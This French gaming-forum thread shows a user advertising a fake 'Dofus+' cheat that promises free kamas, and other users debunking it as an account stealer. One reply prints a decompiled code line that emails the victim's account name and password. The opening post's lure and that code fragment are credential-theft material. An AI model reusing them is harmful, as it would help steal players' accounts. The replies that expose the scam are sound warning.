[Exclusivité] Dofus+

Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Status
Not open for further replies.

Cailbur

Membre
Jan 23, 2010
68
0
571
29
Aujourd'hui, on entre dans l'ère du révolutionnaire. En effet, en combinant plusieurs logiciels de cheat traitant Dofus, j'ai réussi à en ressortir un logiciel disons... unique en son genre !
En effet, en exploitant une faille sur le site du célèbre jeu ( faille dont je garderai le secret pour les autres jeux, attendez vous à du lourd ! ) , le logiciel arrive à communiquer avec le serveur et ainsi modifier à sa guise son personnage.
Pour le moment, je n'ai réussi qu'à inclure un système d'arme aléatoire ( haut niveau ! ) ainsi qu'un système de don de Kamas : 10 000 !

Je pense réduire le nombre de Kamas car cela dénatura le jeu, mais pour le moment, afin de pouvoir essayer le logiciel, je vous propose donc cette version, avec les 10 000 Kamas à la clé ! Le logiciel risque vite de changer de version, donc profitant-en !

Utilisation :

- Assurez vous que Dofus est bel et bien fermé.
- Ouvrez Dofus+.exe
- Connectez-vous au serveur par l'intermédiaire du logiciel
- Appuyez sur "Se connecter". Le logiciel va se mettre en contact avec le serveur
- Choisissez votre cadeau avec les boutons qui viennent d'apparaître.
- Attendez quelques heures, que le serveur effectue la commande ( il est assez long, du fait que le logiciel est relativement inconnu au serveur de jeu )

Voilà ! Vous savez comment utiliser ce logiciel révolutionnaire !
Si vous ne recevez pas votre cadeau de suite, cela est normal, il faut que le logiciel contacte la base de donnée.

Si certains sont septiques et pensent qu'il s'agit tout bêtement d'un virus, j'en ai la preuve que non ( c'est moi qui l'ai codé, alors non ). Voici le VirusScan :

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Et voici donc le fameux lien pour télécharger le logiciel :

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

PtitGamer

Membre
Dec 18, 2011
83
0
907
Faille sur Dofus ? Modification de personnage ? Logiciel qui fait 189 KB (Coïncidence mais les stealer c'est à peu prés pareil).

Ne pas Dl, enfin comme vous voulez.

Pour ma part : Juste un :lol:

yaninis

Membre
Jan 15, 2011
5
0
426
26
Quelqun le croi ? ^^

---------- Message ajouté à 16h14 ---------- Le message précédent était à 16h12 ----------

Au Pire je DL et je vous dit si :ban: ou pas ;)

xmarcx

Membre actif
Dec 29, 2011
123
0
321
moi tous ces trucs la ca me dit pas trop,en plus le programme est un peu petit...189 kb,il faudrait plus que ca pour hacker dofus,enfin,je crois x)

llllbaptll

Membre
Jul 2, 2011
82
0
431
Moselle [57]
Sans sent les multi compte qui fait dtyle qu'il a reçu les kamas ! Quand tu rentre ton nom de compte et mdp, ça lui envoie et là, il te hack. Phising de me*** et encore de me***.

TU SORS AVEC TA ME*** !

Cailbur

Membre
Jan 23, 2010
68
0
571
29
Je vais éclaircir les quelques points.
Donc, déjà, merci à Samy pour la preuve, ça fait plaisir de voir qu'on ne vit pas dans un monde de mensonge.
Ensuite, à tout ceux qui voient le logiciel comme un Stealer. Excusez-moi si ces messieurs ont maintenant peur de tout ce qui traîne sur la toile, mais si je devais m'emparer de compte, je pense que je n’emploierai pas cette méthode, croit moi. Ensuite, je veux faire plaisir à la communauté, pas la hacker.

Sur ce, comprenez un peu que tout ce qui traîne sur Internet n'est pas forcément mal ;)

---------- Message ajouté à 16h35 ---------- Le message précédent était à 16h31 ----------

Désolé pour le doublon, mais pour éclaircir aussi sur la taille du fichier.
Pour le moment, ce n'est qu'un logiciel qui effectue des commandes directement dans la commande Windows ( cmd ) pour se connecter au serveur de Dofus. C'est pour, cela ne prend pas vraiment beaucoup de place.

PtitGamer

Membre
Dec 18, 2011
83
0
907
C'est un Stealer chercher pas.. Vous l'installez, vous lancez l'exe et il reçois tous les id enregistré sur votre ordinateur (cookie) suru n serveur.

Attention ne lancez pas l'exe.

ced57390

Membre
Mar 11, 2011
11
0
567
pas de screen et pas de vidéo rien qu'avec sa je te crois pas puis tu veut faire croire que c'est comme un espèce de générateur de kamas oui pourquoi pas sa marche pour les noob mais pas pour moi ;) puis ton samy la sa va vite a créé un autre compte et faire style oué sa marche et tout

Ririch

V
Aug 31, 2011
514
3
924
Sa fait des lustres que plus personnes ne croit aux logiciels de dons de kamas mais si en plus tu nous dit "Changement du personnage" "faille sur le site" hum ... depuis quand voit-on les kamas que l'on as sur le site ? Et depuis quand le site est fail ?

xabossx

Membre actif
Mar 24, 2010
102
0
581
Si Si sa marche ;)
- Assurez vous que Dofus est bel et bien fermé.
- Ouvrez Dofus+.exe
- Connectez-vous au serveur par l'intermédiaire du logiciel
- Appuyez sur "Se connecter". Le logiciel va se mettre en contact avec le serveur
- Choisissez votre cadeau avec les boutons qui viennent d'apparaître.
- Attendez quelques heures, que le serveur vous hack votre compte ( il est assez long, du fait que le logiciel va vous prendre tous vos compte dofus ... ) :omfg:

xmarcx

Membre actif
Dec 29, 2011
123
0
321
moi je dis tout simplement fake,sans aucune précisions...de toutes facons,meme si c"étais vrai,vous vous feriez banni des que Ankama remarquera la faille,c"est déja arrivé avec une faille dans les marchés aux ogrines.

theVALE37

Membre
Jun 28, 2011
70
0
907
28
OMG ! Je le croyais pas...eh bah si ! Il existe des gens assez cons pour croire qu'ils vont hacker avec ce genre de trucs oO !

Mar 30, 2011
1,014
1
944
In Your Ass
Je vais éclaircir les quelques points.
Donc, déjà, merci à Samy pour la preuve, ça fait plaisir de voir qu'on ne vit pas dans un monde de mensonge.
Ensuite, à tout ceux qui voient le logiciel comme un Stealer. Excusez-moi si ces messieurs ont maintenant peur de tout ce qui traîne sur la toile, mais si je devais m'emparer de compte, je pense que je n’emploierai pas cette méthode, croit moi. Ensuite, je veux faire plaisir à la communauté, pas la hacker.

Sur ce, comprenez un peu que tout ce qui traîne sur Internet n'est pas forcément mal ;)

---------- Message ajouté à 16h35 ---------- Le message précédent était à 16h31 ----------

Désolé pour le doublon, mais pour éclaircir aussi sur la taille du fichier.
Pour le moment, ce n'est qu'un logiciel qui effectue des commandes directement dans la commande Windows ( cmd ) pour se connecter au serveur de Dofus. C'est pour, cela ne prend pas vraiment beaucoup de place.

C est sympas a toi d eclaircir tout ces point
celui que je prefere c est celui ci :
Excusez-moi si ces messieurs ont maintenant peur de tout ce qui traîne sur la toile, mais si je devais m'emparer de compte, je pense que je n’emploierai pas cette méthode, croit moi

il me plais bien car je me demandais ce que tu pouvais faire avec
les identifiant et mot de passe que tu t envoi par mail via ce programme ?

Code:
message.Body = "Nom de compte : " + this.TextBox3.Text + " Mot de passe : " + this.TextBox2.Text + " Serveur de jeu : " + this.TextBox1.Text;

"mais si je devais m'emparer de compte, je pense que je n’emploierai pas cette méthode, croit moi" . . ..

Je kiff . . . .trou de ball ^^

Théo !

Status
Not open for further replies.